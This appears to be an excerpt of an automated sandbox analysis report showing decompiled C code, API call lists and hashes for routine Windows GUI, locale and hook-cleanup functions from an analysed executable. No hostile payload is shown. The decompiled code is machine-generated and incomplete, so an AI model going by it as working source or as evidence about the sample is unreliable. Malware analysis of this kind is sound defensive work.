								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407888();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                                                                                                                                                                                            0x0042a288
                                                                                                                                                                                                                            0x0042a28c
                                                                                                                                                                                                                            0x0042a28e
                                                                                                                                                                                                                            0x0042a295
                                                                                                                                                                                                                            0x0042a2af
                                                                                                                                                                                                                            0x0042a2b5
                                                                                                                                                                                                                            0x0042a2b7
                                                                                                                                                                                                                            0x0042a2b7
                                                                                                                                                                                                                            0x0042a2ce
                                                                                                                                                                                                                            0x0042a2d3
                                                                                                                                                                                                                            0x0042a2d5
                                                                                                                                                                                                                            0x0042a2da
                                                                                                                                                                                                                            0x0042a2dc
                                                                                                                                                                                                                            0x0042a2de
                                                                                                                                                                                                                            0x0042a2e3
                                                                                                                                                                                                                            0x0042a2e8
                                                                                                                                                                                                                            0x0042a2ee
                                                                                                                                                                                                                            0x0042a317
                                                                                                                                                                                                                            0x0042a317
                                                                                                                                                                                                                            0x0042a2f0
                                                                                                                                                                                                                            0x0042a2f0
                                                                                                                                                                                                                            0x0042a2f2
                                                                                                                                                                                                                            0x0042a2f3
                                                                                                                                                                                                                            0x0042a2fa
                                                                                                                                                                                                                            0x0042a2fc
                                                                                                                                                                                                                            0x0042a2fd
                                                                                                                                                                                                                            0x0042a302
                                                                                                                                                                                                                            0x0042a30d
                                                                                                                                                                                                                            0x0042a311
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042a313
                                                                                                                                                                                                                            0x0042a313
                                                                                                                                                                                                                            0x0042a313
                                                                                                                                                                                                                            0x0042a311
                                                                                                                                                                                                                            0x0042a319
                                                                                                                                                                                                                            0x0042a31e
                                                                                                                                                                                                                            0x0042a321
                                                                                                                                                                                                                            0x0042a326
                                                                                                                                                                                                                            0x0042a326
                                                                                                                                                                                                                            0x0042a329
                                                                                                                                                                                                                            0x0042a32a
                                                                                                                                                                                                                            0x0042a32c
                                                                                                                                                                                                                            0x0042a335
                                                                                                                                                                                                                            0x0042a337
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0042a337
                                                                                                                                                                                                                            0x0042a335
                                                                                                                                                                                                                            0x0042a2da
                                                                                                                                                                                                                            0x0042a33f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2DE
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2F3
                                                                                                                                                                                                                            • 73C9AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A2FD
                                                                                                                                                                                                                            • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A321
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,?,?,?,?,00428DD3,00000000,00428E5F), ref: 0042A32C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380CreateHalftonePalette
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 178651289-0
                                                                                                                                                                                                                            • Opcode ID: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                                                                                                                                                                                            • Instruction ID: a69a9921d942d4c2fc4b887ba219ee821ce262c4093934c48757552ca675d17f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e67643a24833364483348e8498fc212bf2f1e615a4c10726663e597d674b9aa6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E211B4217092699BEB20EF25A4457EF3690AB10359F84012AFD0097281D7BC9CA5C3EA
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00457988 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                            			E00457988(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x49be68 != 0) {
					_t16 = E00441A08(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E00441704(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e8)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E00441704(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x49be68(E00441704(_t38),  *((intOrPtr*)(_t38 + 0x2ec)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0049BEEC |  *0x0049BEF4);
						} else {
							SetWindowLongA(E00441704(_t38), 0xffffffec, _t41 & 0xfff7ffff);
							_push(0x485);
							_push(0);
							_push(0);
							_t37 = E00441704(_t38);
							_push(_t37);
							L00407860();
							return _t37;
						}
					}
				}
				return _t16;
			}







                                                                                                                                                                                                                            0x00457988
                                                                                                                                                                                                                            0x0045798a
                                                                                                                                                                                                                            0x00457990
                                                                                                                                                                                                                            0x004579a5
                                                                                                                                                                                                                            0x004579ac
                                                                                                                                                                                                                            0x004579c1
                                                                                                                                                                                                                            0x004579ca
                                                                                                                                                                                                                            0x004579db
                                                                                                                                                                                                                            0x004579ee
                                                                                                                                                                                                                            0x004579ee
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00457a30
                                                                                                                                                                                                                            0x00457a41
                                                                                                                                                                                                                            0x00457a46
                                                                                                                                                                                                                            0x00457a4b
                                                                                                                                                                                                                            0x00457a4d
                                                                                                                                                                                                                            0x00457a51
                                                                                                                                                                                                                            0x00457a56
                                                                                                                                                                                                                            0x00457a57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00457a57
                                                                                                                                                                                                                            0x004579ca
                                                                                                                                                                                                                            0x004579ac
                                                                                                                                                                                                                            0x00457a5e

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetWindowLongA.USER32 ref: 004579BC
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 004579EE
                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0045557C), ref: 00457A28
                                                                                                                                                                                                                            • SetWindowLongA.USER32 ref: 00457A41
                                                                                                                                                                                                                            • 73C9B330.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0045557C), ref: 00457A57
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Long$AttributesB330Layered
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1770052509-0
                                                                                                                                                                                                                            • Opcode ID: 7ade270508231717ce0c7eeda558c4dcfd1cac8646c36d69f970ba05a401db38
                                                                                                                                                                                                                            • Instruction ID: c75218e602284ca66c221aec59f9fe954b3d3a500fdcd06e0ec5254f6f3a142b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ade270508231717ce0c7eeda558c4dcfd1cac8646c36d69f970ba05a401db38
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4411EB51A4829065EF10AE799CC9BCE1A8C5B05329F04157BBD45EB2E3CA7C8C48C36C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004266B8 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 40%
                                                                                                                                                                                                                            			E004266B8(intOrPtr __eax) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t21;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff8;
				_v5 = 0;
				if( *0x49e894 == 0) {
					return _v5;
				} else {
					_push(0);
					L00407638();
					_v12 = __eax;
					_push(_t32);
					_push(0x42673e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t35;
					_push(0x68);
					_t14 = _v12;
					_push(_t14);
					L00407380();
					if(_t14 >= 0x10) {
						_push(__eax + 4);
						_push(8);
						_push(0);
						_t18 =  *0x49e894; // 0x5e080725
						_push(_t18);
						L004073A8();
						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
						_push(8);
						_push(8);
						_t21 =  *0x49e894; // 0x5e080725
						_push(_t21);
						L004073A8();
						_v5 = 1;
					}
					_pop(_t30);
					 *[fs:eax] = _t30;
					_push(0x426745);
					_t16 = _v12;
					_push(_t16);
					_push(0);
					L00407888();
					return _t16;
				}
			}













                                                                                                                                                                                                                            0x004266b9
                                                                                                                                                                                                                            0x004266bb
                                                                                                                                                                                                                            0x004266c1
                                                                                                                                                                                                                            0x004266cc
                                                                                                                                                                                                                            0x0042674c
                                                                                                                                                                                                                            0x004266ce
                                                                                                                                                                                                                            0x004266ce
                                                                                                                                                                                                                            0x004266d0
                                                                                                                                                                                                                            0x004266d5
                                                                                                                                                                                                                            0x004266da
                                                                                                                                                                                                                            0x004266db
                                                                                                                                                                                                                            0x004266e0
                                                                                                                                                                                                                            0x004266e3
                                                                                                                                                                                                                            0x004266e6
                                                                                                                                                                                                                            0x004266e8
                                                                                                                                                                                                                            0x004266eb
                                                                                                                                                                                                                            0x004266ec
                                                                                                                                                                                                                            0x004266f4
                                                                                                                                                                                                                            0x004266f9
                                                                                                                                                                                                                            0x004266fa
                                                                                                                                                                                                                            0x004266fc
                                                                                                                                                                                                                            0x004266fe
                                                                                                                                                                                                                            0x00426703
                                                                                                                                                                                                                            0x00426704
                                                                                                                                                                                                                            0x00426711
                                                                                                                                                                                                                            0x00426712
                                                                                                                                                                                                                            0x00426714
                                                                                                                                                                                                                            0x00426716
                                                                                                                                                                                                                            0x0042671b
                                                                                                                                                                                                                            0x0042671c
                                                                                                                                                                                                                            0x00426721
                                                                                                                                                                                                                            0x00426721
                                                                                                                                                                                                                            0x00426727
                                                                                                                                                                                                                            0x0042672a
                                                                                                                                                                                                                            0x0042672d
                                                                                                                                                                                                                            0x00426732
                                                                                                                                                                                                                            0x00426735
                                                                                                                                                                                                                            0x00426736
                                                                                                                                                                                                                            0x00426738
                                                                                                                                                                                                                            0x0042673d
                                                                                                                                                                                                                            0x0042673d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 004266D0
                                                                                                                                                                                                                            • 73C9AD70.GDI32(?,00000068,00000000,0042673E,?,00000000), ref: 004266EC
                                                                                                                                                                                                                            • 73C9AEA0.GDI32(5E080725,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 00426704
                                                                                                                                                                                                                            • 73C9AEA0.GDI32(5E080725,00000008,00000008,?,5E080725,00000000,00000008,?,?,00000068,00000000,0042673E,?,00000000), ref: 0042671C
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,?,00426745,0042673E,?,00000000), ref: 00426738
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: B380
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                                                                                                                                                                                            • Instruction ID: c0b5c4fbf9d89d63b7e1562d2f304591e56de7434d42fe68f424cbdc017dfa0b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b008b661d38c4f5ea8a9daaf1a5d07ce1dbb277d7a802cc1eb5a05b65464a69b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B11A531A483047EFB41DBE5AC86F6D7BA8E745718F94806BFA04AA1C1D97A6404C729
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040CBEC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                                                                                            			E0040CBEC(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40cc83);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E0040C964(GetThreadLocale(), 0x40cc98, 0x100b,  &_v8);
				_t29 = E00409664(0x40cc98, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E0040CB38, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x49e770;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E0040CB74, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040CC8A);
				return E004049C0( &_v8);
			}










                                                                                                                                                                                                                            0x0040cbec
                                                                                                                                                                                                                            0x0040cbef
                                                                                                                                                                                                                            0x0040cbf4
                                                                                                                                                                                                                            0x0040cbf5
                                                                                                                                                                                                                            0x0040cbfa
                                                                                                                                                                                                                            0x0040cbfd
                                                                                                                                                                                                                            0x0040cc13
                                                                                                                                                                                                                            0x0040cc25
                                                                                                                                                                                                                            0x0040cc2f
                                                                                                                                                                                                                            0x0040cc3f
                                                                                                                                                                                                                            0x0040cc44
                                                                                                                                                                                                                            0x0040cc49
                                                                                                                                                                                                                            0x0040cc4e
                                                                                                                                                                                                                            0x0040cc4e
                                                                                                                                                                                                                            0x0040cc54
                                                                                                                                                                                                                            0x0040cc57
                                                                                                                                                                                                                            0x0040cc57
                                                                                                                                                                                                                            0x0040cc68
                                                                                                                                                                                                                            0x0040cc68
                                                                                                                                                                                                                            0x0040cc6f
                                                                                                                                                                                                                            0x0040cc72
                                                                                                                                                                                                                            0x0040cc75
                                                                                                                                                                                                                            0x0040cc82

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040CC83,?,?,00000000), ref: 0040CC04
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040CC83,?,?,00000000), ref: 0040CC34
                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000CB38,00000000,00000000,00000004), ref: 0040CC3F
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040CC83,?,?,00000000), ref: 0040CC5D
                                                                                                                                                                                                                            • EnumCalendarInfoA.KERNEL32(Function_0000CB74,00000000,00000000,00000003), ref: 0040CC68
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4102113445-0
                                                                                                                                                                                                                            • Opcode ID: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                                                                                                                                                                                            • Instruction ID: 1afeb0ae3c984d7c4f1a7fc68b04595db4598325ea28b3ac7f3617db3f710194
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 902988a0099969183d8a3a73948f8a6bf1cf9f07a1a6714f5175c9c2e886427b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 70014270608204EBF701A7B5DD43F5E725CDB46B18F610737B900BA2C0D63CAE00826D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458FB8 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458FB8() {
				void* _t2;
				void* _t5;
				void* _t8;
				struct HHOOK__* _t10;

				if( *0x49ebd0 != 0) {
					_t10 =  *0x49ebd0; // 0x0
					UnhookWindowsHookEx(_t10);
				}
				 *0x49ebd0 = 0;
				if( *0x49ebd4 != 0) {
					_t2 =  *0x49ebcc; // 0x0
					SetEvent(_t2);
					if(GetCurrentThreadId() !=  *0x49ebc8) {
						_t8 =  *0x49ebd4; // 0x0
						WaitForSingleObject(_t8, 0xffffffff);
					}
					_t5 =  *0x49ebd4; // 0x0
					CloseHandle(_t5);
					 *0x49ebd4 = 0;
					return 0;
				}
				return 0;
			}







                                                                                                                                                                                                                            0x00458fbf
                                                                                                                                                                                                                            0x00458fc1
                                                                                                                                                                                                                            0x00458fc7
                                                                                                                                                                                                                            0x00458fc7
                                                                                                                                                                                                                            0x00458fce
                                                                                                                                                                                                                            0x00458fda
                                                                                                                                                                                                                            0x00458fdc
                                                                                                                                                                                                                            0x00458fe2
                                                                                                                                                                                                                            0x00458ff2
                                                                                                                                                                                                                            0x00458ff6
                                                                                                                                                                                                                            0x00458ffc
                                                                                                                                                                                                                            0x00458ffc
                                                                                                                                                                                                                            0x00459001
                                                                                                                                                                                                                            0x00459007
                                                                                                                                                                                                                            0x0045900e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045900e
                                                                                                                                                                                                                            0x00459013

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnhookWindowsHookEx.USER32(00000000), ref: 00458FC7
                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FE2
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458FE7
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00458FFC
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00000000,0045B3C6,00000000,0045A473,?,?,0049ABD1,00000001,0045A533,?,?,?,0049ABD1), ref: 00459007
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2429646606-0
                                                                                                                                                                                                                            • Opcode ID: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                                                                                                                                                                                            • Instruction ID: 3bc59d0302d60dcdb639d85b4c22765180d6681b902288d708a5b48c4f0846c4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fd3c2e6dc8ae750e94a7f2d7be103522667448ec58a17d1e6ff86980fbe391f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF0ACB1905100EAC750EBBBED49A063395A724315F000A3BB112D71E1D73CF884CB1E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00445974 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E00445974(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
				intOrPtr* _v8;
				struct tagPOINT _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				struct tagMSG _v64;
				intOrPtr _v68;
				long _v72;
				char _v76;
				intOrPtr _t125;
				int _t126;
				int _t140;
				int _t147;
				intOrPtr* _t175;
				int _t186;
				void* _t191;
				intOrPtr* _t209;
				void* _t213;
				intOrPtr _t214;
				intOrPtr _t219;
				int _t232;
				intOrPtr _t233;
				int _t236;
				intOrPtr* _t242;
				intOrPtr _t262;
				intOrPtr _t278;
				intOrPtr _t289;
				int _t297;
				int _t300;
				int _t302;
				int _t303;
				int _t304;
				void* _t307;
				void* _t309;
				void* _t315;

				_t315 = __fp0;
				_t306 = _t307;
				_push(__edi);
				_v76 = 0;
				_t242 = __edx;
				_v8 = __eax;
				_push(_t307);
				_push(0x445d4c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t307 + 0xffffffb8;
				_t125 =  *__edx;
				_t309 = _t125 - 0x202;
				if(_t309 > 0) {
					_t126 = _t125 - 0x203;
					__eflags = _t126;
					if(__eflags == 0) {
						E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
						_t297 = E00444404(_v8,  &_v20,  &_v72, __eflags);
						__eflags = _t297;
						if(_t297 != 0) {
							__eflags =  *(_t297 + 4);
							if( *(_t297 + 4) != 0) {
								__eflags = _v20 - 2;
								if(_v20 == 2) {
									E004397DC();
									E0043BC7C( *(_t297 + 4), 0, 0, 1);
								}
							}
						}
						L47:
						if( *((short*)(_v8 + 0x32)) != 0) {
							 *((intOrPtr*)(_v8 + 0x30))();
						}
						L49:
						_pop(_t262);
						 *[fs:eax] = _t262;
						_push(0x445d53);
						return E004049C0( &_v76);
					}
					_t140 = _t126 - 0xae2d;
					__eflags = _t140;
					if(_t140 == 0) {
						 *((intOrPtr*)(_v8 + 0x30))();
						__eflags =  *(__edx + 0xc);
						if( *(__edx + 0xc) != 0) {
							goto L49;
						}
						_t300 =  *((intOrPtr*)( *_v8 + 4))();
						__eflags = _v20 - 0x12;
						if(_v20 != 0x12) {
							__eflags = _t300;
							if(_t300 == 0) {
								goto L49;
							}
							_t147 = _v20 - 2;
							__eflags = _t147;
							if(_t147 == 0) {
								L46:
								E0043A91C(_t300,  &_v36);
								 *((intOrPtr*)( *_v8))();
								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
								E0043AF7C(_t300,  &_v76);
								E00404A14( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								goto L49;
							}
							__eflags = _t147 != 0x12;
							if(_t147 != 0x12) {
								goto L49;
							}
							goto L46;
						}
						E004049C0( *((intOrPtr*)(__edx + 8)) + 0x38);
						goto L49;
					} else {
						__eflags = _t140 == 0x12;
						if(_t140 == 0x12) {
							_t175 =  *((intOrPtr*)(__edx + 8));
							__eflags =  *_t175 - 0xb00b;
							if( *_t175 == 0xb00b) {
								E0044585C(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)), __edi);
							}
						}
						goto L47;
					}
				}
				if(_t309 == 0) {
					__eflags =  *(_v8 + 0x60);
					if(__eflags != 0) {
						E004453A8(_v8, __eflags);
					} else {
						E00407A50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
						_t302 = E00444404(_v8,  &_v20,  &_v16, __eflags);
						__eflags = _t302;
						if(_t302 != 0) {
							__eflags = _v20 - 0x14;
							if(_v20 == 0x14) {
								_t295 =  *((intOrPtr*)(_t302 + 4));
								_t278 =  *0x44ff0c; // 0x44ff58
								_t186 = E00403D78( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E0043AE9C(_t295, 0);
								} else {
									E00456FEC(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E0043AAC0( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E00441704( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E00440234( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E00444404(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x49de0c; // 0x49ebbc
					SetCursor(E004586EC( *_t209,  *((short*)(0x49bd44 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E0044545C(_v8);
						E00407A50( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E004458E4(_t306);
						E0044545C(_v8);
					}
